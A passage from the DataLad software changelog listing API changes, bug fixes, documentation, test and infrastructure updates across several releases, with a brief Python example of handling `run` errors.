@mih)\n- ``datalad.interface.common_opts.eval_default`` has been deprecated. All (command-specific) defaults for common interface parameters can be read from ``Interface`` class attributes [#6391](https://github.com/datalad/datalad/pull/6391) (by @mih)\n- Remove unused and untested ``datalad.interface.utils`` helpers `cls2cmdlinename` and `path_is_under` [#6392](https://github.com/datalad/datalad/pull/6392) (by @mih)\n- An unused code path for result rendering was removed from the CLI ``main()`` [#6394](https://github.com/datalad/datalad/pull/6394) (by @mih)\n- ``create-sibling`` will now require ``\"^\"`` instead of an empty string for the ``--since`` option [#6436](https://github.com/datalad/datalad/pull/6436) (by @yarikoptic)\n- `run` no longer raises a `CommandError` exception for failed commands, but yields an `error` result that includes a superset of the information provided by the exception. This change impacts command line usage insofar as the exit code of the underlying command is no longer relayed as the exit code of the `run` command call -- although `run` continues to exit with a non-zero exit code in case of an error. For Python API users, the nature of the raised exception changes from `CommandError` to `IncompleteResultsError`, and the exception handling is now configurable using the standard `on_failure` command argument. The original `CommandError` exception remains available via the `exception` property of the newly introduced result record for the command execution, and this result record is available via `IncompleteResultsError.failed`, if such an exception is raised (see the illustrative sketch after this list). [#6447](https://github.com/datalad/datalad/pull/6447) (by @mih)\n- Custom cast helpers were removed from datalad core and migrated to a standalone repository https://github.com/datalad/screencaster [#6516](https://github.com/datalad/datalad/pull/6516) (by @adswa)\n- The `bundled` parameter of `get_connection_hash()` is now ignored and will be removed with a future release. [#6532](https://github.com/datalad/datalad/pull/6532) (by @mih)\n- `BaseDownloader.fetch()` now logs download attempts at the DEBUG (previously INFO) level to avoid polluting output of higher-level commands. [#6564](https://github.com/datalad/datalad/pull/6564) (by @mih)
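\n\nAgain purely as an illustration (not from the release notes), the sketch below shows how a Python API caller might handle the changed error reporting of `run` described in the entry above; the failing command, the dataset path, and the use of `on_failure='stop'` are assumptions made for the example.\n\n```python\n# Illustrative sketch of the CommandError -> IncompleteResultsError change.\nimport datalad.api as dl\nfrom datalad.support.exceptions import IncompleteResultsError\n\ntry:\n    # on_failure is the standard result-handling argument mentioned above\n    dl.run('false', dataset='.', on_failure='stop')\nexcept IncompleteResultsError as e:\n    for res in e.failed:  # result record(s) of the failed execution\n        # per the entry above, the original CommandError is attached to the record\n        print(res.get('status'), type(res.get('exception')).__name__)\n```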
\n\n#### 🐛 Bug Fixes\n\n- ``create-sibling-gitlab`` erroneously overwrote existing sibling configurations. A safeguard will now prevent overwriting and exit with an error result [#6015](https://github.com/datalad/datalad/pull/6015) (by @adswa)\n- ``create-sibling-gogs`` now relays HTTP500 errors, such as \"no space left on device\" [#6019](https://github.com/datalad/datalad/pull/6019) (by @mih)\n- ``annotate_paths()`` is removed from the last parts of the code base that still contained it [#6128](https://github.com/datalad/datalad/pull/6128) (by @mih)\n- ``add_archive_content()`` doesn't crash with ``--key`` and ``--use-current-dir`` anymore [#6105](https://github.com/datalad/datalad/pull/6105) (by @adswa)\n- ``run-procedure`` now returns an error result when a non-existent procedure name is specified [#6143](https://github.com/datalad/datalad/pull/6143) (by @mslw)\n- A fix for a silent failure of ``download-url --archive`` when extracting the archive [#6172](https://github.com/datalad/datalad/pull/6172) (by @adswa)\n- Uninitialized AnnexRepos can now be dropped [#6183](https://github.com/datalad/datalad/pull/6183) (by @mih)\n- Instead of raising an error, the formatters tests are skipped when the ``formatters`` module is not found [#6212](https://github.com/datalad/datalad/pull/6212) (by @adswa)\n- ``create-sibling-gin`` does not disable git-annex availability on Gin remotes anymore [#6230](https://github.com/datalad/datalad/pull/6230) (by @mih)\n- The ORA special remote messaging is fixed to not break the special remote protocol anymore and to better relay messages from exceptions to communicate underlying causes [#6242](https://github.com/datalad/datalad/pull/6242) (by @mih)\n- A ``keyring.delete()`` call was fixed to not call an uninitialized private attribute anymore [#6253](https://github.com/datalad/datalad/pull/6253) (by @bpoldrack)\n- An erroneous placement of result keyword arguments into a ``format()`` method instead of ``get_status_dict()`` of ``create-sibling-ria`` has been fixed [#6256](https://github.com/datalad/datalad/pull/6256) (by @adswa)\n- ``status``, ``run-procedure``, and ``metadata`` are no longer swallowing result-related messages in renderers [#6280](https://github.com/datalad/datalad/pull/6280) (by @mih)\n- ``uninstall`` now recommends the new ``--reckless`` parameter instead of the deprecated ``--nocheck`` parameter when reporting hints [#6277](https://github.com/datalad/datalad/pull/6277) (by @adswa)\n- ``download-url`` learned to handle Path objects [#6317](https://github.com/datalad/datalad/pull/6317) (by @adswa)\n- Restore default result rendering behavior broken by Key interface documentation [#6394](https://github.com/datalad/datalad/pull/6394) (by @mih)\n- Fix a broken check for file presence in the ``ConfigManager`` that could have caused a crash in rare cases when a config file is removed during the process runtime [#6332](https://github.com/datalad/datalad/pull/6332) (by @mih)\n- ``ConfigManager.get_from_source()`` now accesses the correct information when using the documented ``source='local'``, avoiding a crash [#6332](https://github.com/datalad/datalad/pull/6332) (by @mih)\n- ``run`` no longer lets the internal call to `save` render its results unconditionally, but the parameterization of `run` determines the effective rendering format.
[#6421](https://github.com/datalad/datalad/pull/6421) (by @mih)\n- Remove an unnecessary and misleading warning from the runner [#6425](https://github.com/datalad/datalad/pull/6425) (by @christian-monch)\n- A number of commands stopped double-reporting results [#6446](https://github.com/datalad/datalad/pull/6446) (by @adswa)\n- `create-sibling-ria` no longer creates an `annex/objects` directory in-store, when called with `--no-storage-sibling`. [#6495](https://github.com/datalad/datalad/pull/6495) (by @bpoldrack)\n- Improve error message when an invalid URL is given to `clone`. [#6500](https://github.com/datalad/datalad/pull/6500) (by @mih)\n- DataLad declares a minimum version dependency on ``keyring >= 20.0`` to ensure that token-based authentication can be used. [#6515](https://github.com/datalad/datalad/pull/6515) (by @adswa)\n- ORA special remote tries to obtain permissions when dropping a key from a RIA store rather than just failing. Thus, a store whose object trees have the same permissions as one directly managed by git-annex now works just fine. [#6493](https://github.com/datalad/datalad/pull/6493) (by @bpoldrack)\n- `require_dataset()` now uniformly raises `NoDatasetFound` when no dataset was found. Implementations that catch the previously documented `InsufficientArgumentsError` or the actually raised `ValueError` will continue to work, because `NoDatasetFound` is derived from both types. [#6521](https://github.com/datalad/datalad/pull/6521) (by @mih)\n- Keyboard-interactive authentication is now possible with non-multiplexed SSH connections (i.e., when no connection sharing is possible, due to lack of socket support, for example on Windows). Previously, it was disabled forcefully by DataLad for no valid reason. [#6537](https://github.com/datalad/datalad/pull/6537) (by @mih)\n- Remove duplicate exception type in reporting of top-level CLI exception handler. [#6563](https://github.com/datalad/datalad/pull/6563) (by @mih)\n- Fixes DataLad's parsing of git-annex' reporting on unknown paths depending on its version and the value of the `annex.skipunknown` config. [#6550](https://github.com/datalad/datalad/pull/6550) (by @bpoldrack)\n- Fix ORA special remote not properly reporting on HTTP failures. [#6535](https://github.com/datalad/datalad/pull/6535) (by @bpoldrack)\n- ORA special remote didn't show per-file progress bars when downloading over HTTP [#6609](https://github.com/datalad/datalad/pull/6609) (by @bpoldrack)\n- `save` can now commit the change where a file becomes a directory with a file staged for commit. [#6581](https://github.com/datalad/datalad/pull/6581) (by @yarikoptic)\n- `create-sibling` will no longer create siblings for not yet saved new subdatasets, and will now create siblings for sub-datasets nested in the subdatasets which did not yet have those siblings.
[#6603](https://github.com/datalad/datalad/pull/6603) (by @yarikoptic)\n\n#### 📝 Documentation\n\n- A new design document sheds light on result records [#6167](https://github.com/datalad/datalad/pull/6167) (by @mih)\n- The ``disabled`` result renderer mode is documented [#6174](https://github.com/datalad/datalad/pull/6174) (by @mih)\n- A new design document sheds light on the ``datalad`` and ``datalad-archives`` special remotes [#6181](https://github.com/datalad/datalad/pull/6181) (by @mih)\n- A new design document sheds light on ``BatchedCommand`` and ``BatchedAnnex`` [#6203](https://github.com/datalad/datalad/pull/6203) (by @christian-monch)\n- A new design document sheds light on standard parameters [#6214](https://github.com/datalad/datalad/pull/6214) (by @adswa)\n- The DataLad project adopted the Contributor Covenant COC v2.1 [#6236](https://github.com/datalad/datalad/pull/6236) (by @adswa)\n- Docstrings learned to include Sphinx' \"version added\" and \"deprecated\" directives [#6249](https://github.com/datalad/datalad/pull/6249) (by @mih)\n- A design document sheds light on basic docstring handling and formatting [#6249](https://github.com/datalad/datalad/pull/6249) (by @mih)\n- A new design document sheds light on position versus keyword parameter usage [#6261](https://github.com/datalad/datalad/pull/6261) (by @yarikoptic)\n- ``create-sibling-gin``'s examples have been improved to suggest ``push`` as an additional step to ensure proper configuration [#6289](https://github.com/datalad/datalad/pull/6289) (by @mslw)\n- A new [document](http://docs.datalad.org/credentials.html) describes the credential system from a user's perspective [#5796](https://github.com/datalad/datalad/pull/5796) (by @bpoldrack)\n- Enhance the [design document](http://docs.datalad.org/design/credentials.html) on DataLad's credential system [#5796](https://github.com/datalad/datalad/pull/5796) (by @bpoldrack)\n- The documentation of the configuration command now details all locations DataLad is reading configuration items from, and their respective rules of precedence [#6306](https://github.com/datalad/datalad/pull/6306) (by @mih)\n- API docs for datalad.interface.base are now included in the documentation [#6378](https://github.com/datalad/datalad/pull/6378) (by @mih)\n- A new design document is provided that describes the basics of the command line interface implementation [#6382](https://github.com/datalad/datalad/pull/6382) (by @mih)\n- The ``datalad.interface.base.Interface` class, the basis of all DataLad command implementations, has been extensively documented to provide an overview of basic principles and customization possibilities [#6391](https://github.com/datalad/datalad/pull/6391) (by @mih)\n- `--since=^` mode of operation of `create-sibling` is documented now [#6436](https://github.com/datalad/datalad/pull/6436) (by @yarikoptic)\n\n#### 🏠 Internal\n\n- The internal ``status()`` helper was equipped with docstrings and promotes \"breadth-first\" reporting with a new parameter ``reporting_order`` [#6006](https://github.com/datalad/datalad/pull/6006) (by @mih)\n- ``AnnexRepo.get_file_annexinfo()`` is introduced for more convenient queries for single files and replaces a now deprecated ``AnnexRepo.get_file_key()`` to receive information with fewer calls to Git [#6104](https://github.com/datalad/datalad/pull/6104) (by @mih)\n- A new ``get_paths_by_ds()`` helper exposes ``status``' path normalization and sorting [#6110](https://github.com/datalad/datalad/pull/6110) (by @mih)\n- ``status`` is optimized 
with a cache for dataset roots [#6137](https://github.com/datalad/datalad/pull/6137) (by @yarikoptic)\n- The internal ``get_func_args_doc()`` helper with Python 2 is removed from DataLad core [#6175](https://github.com/datalad/datalad/pull/6175) (by @yarikoptic)\n- Further restructuring of the source tree to better reflect the internal dependency structure of the code: ``AddArchiveContent`` is moved from ``datalad/interface`` to ``datalad/local`` ([#6188](https://github.com/datalad/datalad/pull/6188) (by @mih)), ``Clean`` is moved from ``datalad/interface`` to ``datalad/local`` ([#6191](https://github.com/datalad/datalad/pull/6191) (by @mih)), ``Unlock`` is moved from ``datalad/interface`` to ``datalad/local`` ([#6192](https://github.com/datalad/datalad/pull/6192) (by @mih)), ``DownloadURL`` is moved from ``datalad/interface`` to ``datalad/local`` ([#6217](https://github.com/datalad/datalad/pull/6217) (by @mih)), ``Rerun`` is moved from ``datalad/interface`` to ``datalad/local`` ([#6220](https://github.com/datalad/datalad/pull/6220) (by @mih)), ``RunProcedure`` is moved from ``datalad/interface`` to ``datalad/local`` ([#6222](https://github.com/datalad/datalad/pull/6222) (by @mih)). The interface command list is restructured and resorted [#6223](https://github.com/datalad/datalad/pull/6223) (by @mih)\n- ``wrapt`` is replaced with functools' ``wraps``\n[#6190](https://github.com/datalad/datalad/pull/6190) (by @yariktopic)\n- The unmaintained ``appdirs`` library has been replaced with ``platformdirs`` [#6198](https://github.com/datalad/datalad/pull/6198) (by @adswa)\n- Modelines mismatching the code style in source files were fixed [#6263](https://github.com/datalad/datalad/pull/6263) (by @AKSoo)\n- ``datalad/__init__.py`` has been cleaned up [#6271](https://github.com/datalad/datalad/pull/6271) (by @mih)\n- ``GitRepo.call_git_items`` is implemented with a generator-based runner [#6278](https://github.com/datalad/datalad/pull/6278) (by @christian-monch)\n- Separate positional from keyword arguments in the Python API to match CLI with ``*`` [#6176](https://github.com/datalad/datalad/pull/6176) (by @yarikoptic), [#6304](https://github.com/datalad/datalad/pull/6304) (by @christian-monch)\n- ``GitRepo.bare`` does not require the ConfigManager anymore [#6323](https://github.com/datalad/datalad/pull/6323) (by @mih)\n- ``_get_dot_git()`` was reimplemented to be more efficient and consistent, by testing for common scenarios first and introducing a consistently applied ``resolved`` flag for result path reporting [#6325](https://github.com/datalad/datalad/pull/6325) (by @mih)\n- All data files under ``datalad`` are now included when installing DataLad [#6336](https://github.com/datalad/datalad/pull/6336) (by @jwodder)\n- Add internal method for non-interactive provider/credential storing [#5796](https://github.com/datalad/datalad/pull/5796) (by @bpoldrack)\n- Allow credential classes to have a context set, consisting of a URL they are to be used with and a dataset DataLad is operating on, allowing to consider \"local\" and \"dataset\" config locations [#5796](https://github.com/datalad/datalad/pull/5796) (by @bpoldrack)\n- The Interface method ``get_refds_path()`` was deprecated [#6387](https://github.com/datalad/datalad/pull/6387) (by @adswa)\n- ``datalad.interface.base.Interface`` is now an abstract class [#6391](https://github.com/datalad/datalad/pull/6391) (by @mih)\n- Simplified the decision making for result rendering, and reduced code complexity 
[#6394](https://github.com/datalad/datalad/pull/6394) (by @mih)\n- Reduce code duplication in ``datalad.support.json_py`` [#6398](https://github.com/datalad/datalad/pull/6398) (by @mih)\n- Use public `ArgumentParser.parse_known_args` instead of protected `_parse_known_args` [#6414](https://github.com/datalad/datalad/pull/6414) (by @yarikoptic)\n- `add-archive-content` does not rely on the deprecated `tempfile.mktemp` anymore, but uses the more secure `tempfile.mkdtemp` [#6428](https://github.com/datalad/datalad/pull/6428) (by @adswa)\n- AnnexRepo's internal `annexstatus` is deprecated. In its place, a new test helper assists the few tests that rely on it [#6413](https://github.com/datalad/datalad/pull/6413) (by @adswa)\n- ``config`` has been refactored from ``where[=\"dataset\"]`` to ``scope[=\"branch\"]`` [#5969](https://github.com/datalad/datalad/pull/5969) (by @yarikoptic)\n- Common command arguments are now uniformly and exhaustively passed to result renderers and filters for decision making. Previously, the presence of a particular argument depended on the respective API and circumstances of a command call. [#6440](https://github.com/datalad/datalad/pull/6440) (by @mih)\n- Entrypoint processing for extensions and metadata extractors has been consolidated on a uniform helper that is about twice as fast as the previous implementations. [#6591](https://github.com/datalad/datalad/pull/6591) (by @mih)\n\n#### 🛡 Tests\n\n- A range of Windows tests pass and were enabled [#6136](https://github.com/datalad/datalad/pull/6136) (by @adswa)\n- Invalid escape sequences in some tests were fixed [#6147](https://github.com/datalad/datalad/pull/6147) (by @mih)\n- A cross-platform compatible HTTP-serving test environment is introduced [#6153](https://github.com/datalad/datalad/pull/6153) (by @mih)\n- A new helper exposes ``serve_path_via_http`` to the command line to deploy an ad-hoc instance of the HTTP server used for internal testing, with SSL and auth, if desired. 
[#6169](https://github.com/datalad/datalad/pull/6169) (by @mih)\n- Windows tests were redistributed across worker runs to harmonize runtime [#6200](https://github.com/datalad/datalad/pull/6200) (by @adswa)\n- ``Batchedcommand`` gained a basic test [#6203](https://github.com/datalad/datalad/pull/6203) (by @christian-monch)\n- The use of ``with_testrepo`` is discontinued in all core tests [#6224](https://github.com/datalad/datalad/pull/6224) (by @mih)\n- The new ``git-annex.filter.annex.process`` configuration is enabled by default on Windows to speed up the test suite [#6245](https://github.com/datalad/datalad/pull/6245) (by @mih)\n- If the available Git version supports it, the test suite now uses ``GIT_CONFIG_GLOBAL`` to configure a fake home directory instead of overwriting ``HOME`` on OSX ([#6251](https://github.com/datalad/datalad/pull/6251) (by @bpoldrack)) and ``HOME`` and ``USERPROFILE`` on Windows [#6260](https://github.com/datalad/datalad/pull/6260) (by @adswa)\n- Windows test timeouts of runners were addressed [#6311](https://github.com/datalad/datalad/pull/6311) (by @christian-monch)\n- A handful of Windows tests were fixed ([#6352](https://github.com/datalad/datalad/pull/6352) (by @yarikoptic)) or disabled ([#6353](https://github.com/datalad/datalad/pull/6353) (by @yarikoptic))\n- ``download-url``'s test under ``http_proxy`` are skipped when a session can't be established [#6361](https://github.com/datalad/datalad/pull/6361) (by @yarikoptic)\n- A test for ``datalad clean`` was fixed to be invoked within a dataset [#6359](https://github.com/datalad/datalad/pull/6359) (by @yarikoptic)\n- The new datalad.cli.tests have an improved module coverage of 80% [#6378](https://github.com/datalad/datalad/pull/6378) (by @mih)\n- The ``test_source_candidate_subdataset`` has been marked as ``@slow`` [#6429](https://github.com/datalad/datalad/pull/6429) (by @yarikoptic)\n- Dedicated ``CLI`` benchmarks exist now [#6381](https://github.com/datalad/datalad/pull/6381) (by @mih)\n- Enable code coverage report for subprocesses [#6546](https://github.com/datalad/datalad/pull/6546) (by @adswa)\n- Skip a test on annex>=10.20220127 due to a bug in annex. See https://git-annex.branchable.com/bugs/Change_to_annex.largefiles_leaves_repo_modified/\n\n#### 🚧 Infra\n\n- A new issue template using GitHub forms prestructures bug reports [#6048](https://github.com/datalad/datalad/pull/6048) (by @Remi-Gau)\n- DataLad and its dependency stack were packaged for Gentoo Linux [#6088](https://github.com/datalad/datalad/pull/6088) (by @TheChymera)\n- The readthedocs configuration is modernized to version 2 [#6207](https://github.com/datalad/datalad/pull/6207) (by @adswa)\n- The Windows CI setup now runs on Appveyor's Visual Studio 2022 configuration [#6228](https://github.com/datalad/datalad/pull/6228) (by @adswa)\n- The ``readthedocs-theme`` and ``Sphinx`` versions were pinned to re-enable rendering of bullet points in the documentation [#6346](https://github.com/datalad/datalad/pull/6346) (by @adswa)\n- The PR template was updated with a CHANGELOG template. Future PRs should use it to include a summary for the CHANGELOG [#6396](https://github.com/datalad/datalad/pull/6396) (by @mih)\n\n#### Authors: 11\n\n- Michael Hanke (@mih)\n- Yaroslav Halchenko (@yarikoptic)\n- Adina Wagner (@adswa)\n- Remi Gau (@Remi-Gau)\n- Horea Christian (@TheChymera)\n- Michał Szczepanik (@mslw)\n- Christian Mönch (@christian-monch)\n- John T. 
Wodder (@jwodder)\n- Benjamin Poldrack (@bpoldrack)\n- Sin Kim (@AKSoo)\n- Basile Pinsard (@bpinsard)\n\n---\n\n# 0.15.6 (Sun Feb 27 2022)\n\n#### 🐛 Bug Fix\n\n- BF: do not use BaseDownloader instance wide InterProcessLock - resolves stalling or errors during parallel installs [#6507](https://github.com/datalad/datalad/pull/6507) ([@yarikoptic](https://github.com/yarikoptic))\n- release workflow: add -vv to auto invocation ([@yarikoptic](https://github.com/yarikoptic))\n- Fix version incorrectly incremented by release process in CHANGELOGs [#6459](https://github.com/datalad/datalad/pull/6459) ([@yarikoptic](https://github.com/yarikoptic))\n- BF(TST): add another condition to skip under http_proxy set [#6459](https://github.com/datalad/datalad/pull/6459) ([@yarikoptic](https://github.com/yarikoptic))\n\n#### Authors: 1\n\n- Yaroslav Halchenko ([@yarikoptic](https://github.com/yarikoptic))\n\n---\n\n# 0.15.5 (Wed Feb 09 2022)\n\n#### 🚀 Enhancement\n\n- BF: When download-url gets Pathobject as path convert it to a string [#6364](https://github.com/datalad/datalad/pull/6364) ([@adswa](https://github.com/adswa))\n\n#### 🐛 Bug Fix\n\n- Fix AnnexRepo.whereis key=True mode operation, and add batch mode support [#6379](https://github.com/datalad/datalad/pull/6379) ([@yarikoptic](https://github.com/yarikoptic))\n- DOC: run - adjust description for -i/-o to mention that it could be a directory [#6416](https://github.com/datalad/datalad/pull/6416) ([@yarikoptic](https://github.com/yarikoptic))\n- BF: ORA over HTTP tried to check archive [#6355](https://github.com/datalad/datalad/pull/6355) ([@bpoldrack](https://github.com/bpoldrack) [@yarikoptic](https://github.com/yarikoptic))\n- BF: condition access to isatty to have stream eval to True [#6360](https://github.com/datalad/datalad/pull/6360) ([@yarikoptic](https://github.com/yarikoptic))\n- BF: python 3.10 compatibility fixes [#6363](https://github.com/datalad/datalad/pull/6363) ([@yarikoptic](https://github.com/yarikoptic))\n- Remove two(!) 
copies of a test [#6374](https://github.com/datalad/datalad/pull/6374) ([@mih](https://github.com/mih))\n- Warn just once about incomplete git config [#6343](https://github.com/datalad/datalad/pull/6343) ([@yarikoptic](https://github.com/yarikoptic))\n- Make version detection robust to GIT_DIR specification [#6341](https://github.com/datalad/datalad/pull/6341) ([@effigies](https://github.com/effigies) [@mih](https://github.com/mih))\n- BF(Q&D): do not crash - issue warning - if template fails to format [#6319](https://github.com/datalad/datalad/pull/6319) ([@yarikoptic](https://github.com/yarikoptic))\n\n#### Authors: 5\n\n- Adina Wagner ([@adswa](https://github.com/adswa))\n- Benjamin Poldrack ([@bpoldrack](https://github.com/bpoldrack))\n- Chris Markiewicz ([@effigies](https://github.com/effigies))\n- Michael Hanke ([@mih](https://github.com/mih))\n- Yaroslav Halchenko ([@yarikoptic](https://github.com/yarikoptic))\n\n---\n\n# 0.15.4 (Thu Dec 16 2021)\n\n#### 🐛 Bug Fix\n\n- BF: autorc - replace incorrect releaseTypes with \"none\" [#6320](https://github.com/datalad/datalad/pull/6320) ([@yarikoptic](https://github.com/yarikoptic))\n- Minor enhancement to CONTRIBUTING.md [#6309](https://github.com/datalad/datalad/pull/6309) ([@bpoldrack](https://github.com/bpoldrack))\n- UX: If a clean repo is dirty after a failed run, give clean-up hints [#6112](https://github.com/datalad/datalad/pull/6112) ([@adswa](https://github.com/adswa))\n- Stop using distutils [#6113](https://github.com/datalad/datalad/pull/6113) ([@jwodder](https://github.com/jwodder))\n- BF: RIARemote - set UI backend to annex to make it interactive [#6287](https://github.com/datalad/datalad/pull/6287) ([@yarikoptic](https://github.com/yarikoptic) [@bpoldrack](https://github.com/bpoldrack))\n- Fix invalid escape sequences [#6293](https://github.com/datalad/datalad/pull/6293) ([@jwodder](https://github.com/jwodder))\n- CI: Update environment for windows CI builds [#6292](https://github.com/datalad/datalad/pull/6292) ([@bpoldrack](https://github.com/bpoldrack))\n- bump the python version used for mac os tests [#6288](https://github.com/datalad/datalad/pull/6288) ([@christian-monch](https://github.com/christian-monch) [@bpoldrack](https://github.com/bpoldrack))\n- ENH(UX): log a hint to use ulimit command in case of \"Too long\" exception [#6173](https://github.com/datalad/datalad/pull/6173) ([@yarikoptic](https://github.com/yarikoptic))\n- Report correct HTTP URL for RIA store content [#6091](https://github.com/datalad/datalad/pull/6091) ([@mih](https://github.com/mih))\n- BF: Don't overwrite subdataset source candidates [#6168](https://github.com/datalad/datalad/pull/6168) ([@bpoldrack](https://github.com/bpoldrack))\n- Bump sphinx requirement to bypass readthedocs defaults [#6189](https://github.com/datalad/datalad/pull/6189) ([@mih](https://github.com/mih))\n- infra: Provide custom prefix to auto-related labels [#6151](https://github.com/datalad/datalad/pull/6151) ([@adswa](https://github.com/adswa))\n- Remove all usage of exc_str() [#6142](https://github.com/datalad/datalad/pull/6142) ([@mih](https://github.com/mih))\n- BF: obtain information about annex special remotes also from annex journal [#6135](https://github.com/datalad/datalad/pull/6135) ([@yarikoptic](https://github.com/yarikoptic) [@mih](https://github.com/mih))\n- BF: clone tried to save new subdataset despite failing to clone [#6140](https://github.com/datalad/datalad/pull/6140) ([@bpoldrack](https://github.com/bpoldrack))\n\n#### 🧪 Tests\n\n- RF+BF: use 
skip_if_no_module helper instead of try/except for libxmp and boto [#6148](https://github.com/datalad/datalad/pull/6148) ([@yarikoptic](https://github.com/yarikoptic))\n- git://github.com -> https://github.com [#6134](https://github.com/datalad/datalad/pull/6134) ([@mih](https://github.com/mih))\n\n#### Authors: 6\n\n- Adina Wagner ([@adswa](https://github.com/adswa))\n- Benjamin Poldrack ([@bpoldrack](https://github.com/bpoldrack))\n- Christian Mönch ([@christian-monch](https://github.com/christian-monch))\n- John T. Wodder II ([@jwodder](https://github.com/jwodder))\n- Michael Hanke ([@mih](https://github.com/mih))\n- Yaroslav Halchenko ([@yarikoptic](https://github.com/yarikoptic))\n\n---\n\n# 0.15.3 (Sat Oct 30 2021)\n\n#### 🐛 Bug Fix\n\n- BF: Don't make create-sibling recursive by default [#6116](https://github.com/datalad/datalad/pull/6116) ([@adswa](https://github.com/adswa))\n- BF: Add dashes to 'force' option in non-empty directory error message [#6078](https://github.com/datalad/datalad/pull/6078) ([@DisasterMo](https://github.com/DisasterMo))\n- DOC: Add supported URL types to download-url's docstring [#6098](https://github.com/datalad/datalad/pull/6098) ([@adswa](https://github.com/adswa))\n- BF: Retain git-annex error messages & don't show them if operation successful [#6070](https://github.com/datalad/datalad/pull/6070) ([@DisasterMo](https://github.com/DisasterMo))\n- Remove uses of `__full_version__` and `datalad.version` [#6073](https://github.com/datalad/datalad/pull/6073) ([@jwodder](https://github.com/jwodder))\n- BF: ORA shouldn't crash while handling a failure [#6063](https://github.com/datalad/datalad/pull/6063) ([@bpoldrack](https://github.com/bpoldrack))\n- DOC: Refine --reckless docstring on usage and wording [#6043](https://github.com/datalad/datalad/pull/6043) ([@adswa](https://github.com/adswa))\n- BF: archives upon strip - use rmtree which retries etc instead of rmdir [#6064](https://github.com/datalad/datalad/pull/6064) ([@yarikoptic](https://github.com/yarikoptic))\n- BF: do not leave test in a tmp dir destined for removal [#6059](https://github.com/datalad/datalad/pull/6059) ([@yarikoptic](https://github.com/yarikoptic))\n- Next wave of exc_str() removals [#6022](https://github.com/datalad/datalad/pull/6022) ([@mih](https://github.com/mih))\n\n#### ⚠️ Pushed to `maint`\n\n- CI: Enable new codecov uploader in Appveyor CI ([@adswa](https://github.com/adswa))\n\n#### 🏠 Internal\n\n- UX: Log clone-candidate number and URLs [#6092](https://github.com/datalad/datalad/pull/6092) ([@adswa](https://github.com/adswa))\n- UX/ENH: Disable reporting, and don't do superfluous internal subdatasets calls [#6094](https://github.com/datalad/datalad/pull/6094) ([@adswa](https://github.com/adswa))\n- Update codecov action to v2 [#6072](https://github.com/datalad/datalad/pull/6072) ([@jwodder](https://github.com/jwodder))\n\n#### 📝 Documentation\n\n- Design document on URL substitution feature [#6065](https://github.com/datalad/datalad/pull/6065) ([@mih](https://github.com/mih))\n\n#### 🧪 Tests\n\n- BF(TST): remove reuse of the same tape across unrelated tests [#6127](https://github.com/datalad/datalad/pull/6127) ([@yarikoptic](https://github.com/yarikoptic))\n- Fail Travis tests on deprecation warnings [#6074](https://github.com/datalad/datalad/pull/6074) ([@jwodder](https://github.com/jwodder))\n- Ux get result handling broken [#6052](https://github.com/datalad/datalad/pull/6052) ([@christian-monch](https://github.com/christian-monch))\n- enable metalad tests again 
[#6060](https://github.com/datalad/datalad/pull/6060) ([@christian-monch](https://github.com/christian-monch))\n\n#### Authors: 7\n\n- Adina Wagner ([@adswa](https://github.com/adswa))\n- Benjamin Poldrack ([@bpoldrack](https://github.com/bpoldrack))\n- Christian Mönch ([@christian-monch](https://github.com/christian-monch))\n- John T. Wodder II ([@jwodder](https://github.com/jwodder))\n- Michael Burgardt ([@DisasterMo](https://github.com/DisasterMo))\n- Michael Hanke ([@mih](https://github.com/mih))\n- Yaroslav Halchenko ([@yarikoptic](https://github.com/yarikoptic))\n\n---\n\n# 0.15.2 (Wed Oct 06 2021)\n\n#### 🐛 Bug Fix\n\n- BF: Don't suppress datalad subdatasets output [#6035](https://github.com/datalad/datalad/pull/6035) ([@DisasterMo](https://github.com/DisasterMo) [@mih](https://github.com/mih))\n- Honor datalad.runtime.use-patool if set regardless of OS (was Windows only) [#6033](https://github.com/datalad/datalad/pull/6033) ([@mih](https://github.com/mih))\n- Discontinue usage of deprecated (public) helper [#6032](https://github.com/datalad/datalad/pull/6032) ([@mih](https://github.com/mih))\n- BF: ProgressHandler - close the other handler if was specified [#6020](https://github.com/datalad/datalad/pull/6020) ([@yarikoptic](https://github.com/yarikoptic))\n- UX: Report GitLab weburl of freshly created projects in the result [#6017](https://github.com/datalad/datalad/pull/6017) ([@adswa](https://github.com/adswa))\n- Ensure there's a blank line between the class `__doc__` and \"Parameters\" in `build_doc` docstrings [#6004](https://github.com/datalad/datalad/pull/6004) ([@jwodder](https://github.com/jwodder))\n- Large code-reorganization of everything runner-related [#6008](https://github.com/datalad/datalad/pull/6008) ([@mih](https://github.com/mih))\n- Discontinue exc_str() in all modern parts of the code base [#6007](https://github.com/datalad/datalad/pull/6007) ([@mih](https://github.com/mih))\n\n#### 🧪 Tests\n\n- TST: Add test to ensure functionality with subdatasets starting with a hyphen (-) [#6042](https://github.com/datalad/datalad/pull/6042) ([@DisasterMo](https://github.com/DisasterMo))\n- BF(TST): filter away warning from coverage from analysis of stderr of --help [#6028](https://github.com/datalad/datalad/pull/6028) ([@yarikoptic](https://github.com/yarikoptic))\n- BF: disable outdated SSL root certificate breaking chain on older/buggy clients [#6027](https://github.com/datalad/datalad/pull/6027) ([@yarikoptic](https://github.com/yarikoptic))\n- BF: start global test_http_server only if not running already [#6023](https://github.com/datalad/datalad/pull/6023) ([@yarikoptic](https://github.com/yarikoptic))\n\n#### Authors: 5\n\n- Adina Wagner ([@adswa](https://github.com/adswa))\n- John T. 
Wodder II ([@jwodder](https://github.com/jwodder))\n- Michael Burgardt ([@DisasterMo](https://github.com/DisasterMo))\n- Michael Hanke ([@mih](https://github.com/mih))\n- Yaroslav Halchenko ([@yarikoptic](https://github.com/yarikoptic))\n\n---\n\n# 0.15.1 (Fri Sep 24 2021)\n\n#### 🐛 Bug Fix\n\n- BF: downloader - fail to download even on non-crippled FS if symlink exists [#5991](https://github.com/datalad/datalad/pull/5991) ([@yarikoptic](https://github.com/yarikoptic))\n- ENH: import datalad.api to bind extensions methods for discovery of dataset methods [#5999](https://github.com/datalad/datalad/pull/5999) ([@yarikoptic](https://github.com/yarikoptic))\n- Restructure cmdline API presentation [#5988](https://github.com/datalad/datalad/pull/5988) ([@mih](https://github.com/mih))\n- Close file descriptors after process exit [#5983](https://github.com/datalad/datalad/pull/5983) ([@mih](https://github.com/mih))\n\n#### ⚠️ Pushed to `maint`\n\n- Discontinue testing of hirni extension ([@mih](https://github.com/mih))\n\n#### 🏠 Internal\n\n- Add debugging information to release step [#5980](https://github.com/datalad/datalad/pull/5980) ([@jwodder](https://github.com/jwodder))\n\n#### 📝 Documentation\n\n- Coarse description of the credential subsystem's functionality 